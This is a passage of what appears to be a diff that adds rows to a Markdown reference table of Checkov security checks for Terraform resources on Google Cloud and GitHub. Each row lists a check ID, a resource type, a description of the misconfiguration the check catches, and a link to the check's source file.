+| 1735 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) |
+| 1736 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) |
+| 1737 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) |
+| 1738 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) |
+| 1739 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) |
+| 1740 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) |
+| 1741 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) |
+| 1742 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) |
+| 1743 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) |
+| 1744 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) |
+| 1745 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) |
+| 1746 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) |
+| 1747 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) |
+| 1748 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 1749 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 1750 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 1751 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 1752 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) |
+| 1753 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) |
+| 1754 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) |
+| 1755 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) |
+| 1756 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 1757 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 1758 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 1759 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) |
+| 1760 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) |
+| 1761 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 1762 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 1763 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 1764 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 1765 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 1766 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 1767 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) |
+| 1768 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) |
+| 1769 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) |
+| 1770 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) |
+| 1771 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) |
+| 1772 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) |
+| 1773 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 1774 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) |
+| 1775 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) |
+| 1776 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) |
+| 1777 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) |
+| 1778 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 1779 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 1780 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 1781 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) |
+| 1782 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 1783 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) |
+| 1784 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 1785 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 1786 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) |
+| 1787 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 1788 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) |
+| 1789 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 1790 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 1791 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) |
+| 1792 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 1793 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 1794 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) |
+| 1795 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) |
+| 1796 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) |
+| 1797 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) |
+| 1798 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) |
+| 1799 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) |
+| 1800 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) |
+| 1801 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) |
+| 1802 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) |
+| 1803 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) |
+| 1804 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
+| 1805 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) |
+| 1806 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) |
+| 1807 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) |
+| 1808 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) |
+| 1809 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) |
+| 1810 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) |
+| 1811 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) |
+| 1812 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) |
+| 1813 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) |
+| 1814 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) |
+| 1815 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) |
+| 1816 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) |
+| 1817 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
+| 1818 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
+| 1819 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
+| 1820 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
+| 1821 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
+| 1822 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) |
+| 1823 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) |
+| 1824 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) |
+| 1825 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1826 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1827 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1828 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 1829 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 1830 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
+| 1831 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
